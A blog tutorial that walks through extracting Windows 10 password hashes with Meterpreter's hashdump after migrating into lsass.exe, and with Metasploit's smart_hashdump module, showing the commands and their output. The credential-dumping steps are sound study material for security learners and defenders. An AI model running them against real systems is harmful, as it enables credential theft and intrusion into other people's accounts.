Gaining access to local password hashes on a Windows 10 system can be crucial for attackers. Two main methods are discussed here: using the Meterpreter hashdump command and leveraging the Metasploit smart_hashdump module.
Method 1: Using Meterpreter hashdump
Step-by-Step Process:
Initial Attempt to Dump Hashes:
meterpreter > hashdump
This command often fails due to modern protections in Windows:
[-] priv_passwd_get_sam_hashes: Operation failed: The parameter is incorrect.
2. Identify lsass.exe Process:
meterpreter > ps -S lsass.exe
3. Migrate to lsass.exe:
meterpreter > migrate 620
[*] Migrating from 1248 to 620 ...
[*] Migration completed successfully.
4. Dump Hashes After Migration:
meterpreter > hashdump
Note: If migration fails, you may need to try migrating to another SYSTEM process first before migrating to lsass.exe.
Method 2: Using Metasploit smart_hashdump Module
Step-by-Step Process:
Identify a SYSTEM Process:
meterpreter > ps -A x64 -a
Choose a SYSTEM process (avoid svchost.exe).
2. Migrate to Chosen Process:
meterpreter > migrate 1404
[*] Migrating from 448 to 1404 ...
[*] Migration completed successfully.
3. Run smart_hashdump:
meterpreter > run post/windows/gather/smart_hashdump
Successful output saves the hashes to a file:
Advantages of smart_hashdump:
Attempts to retrieve both local and domain account password hashes if the target is a domain controller.
Bypasses some of the limitations of directly dumping from lsass.exe.
Conclusion
Using tools like Meterpreter's hashdump and Metasploit's smart_hashdump module, attackers can effectively extract password hashes from Windows 10 systems
We will continue in next blog...........................................................
Akash Patel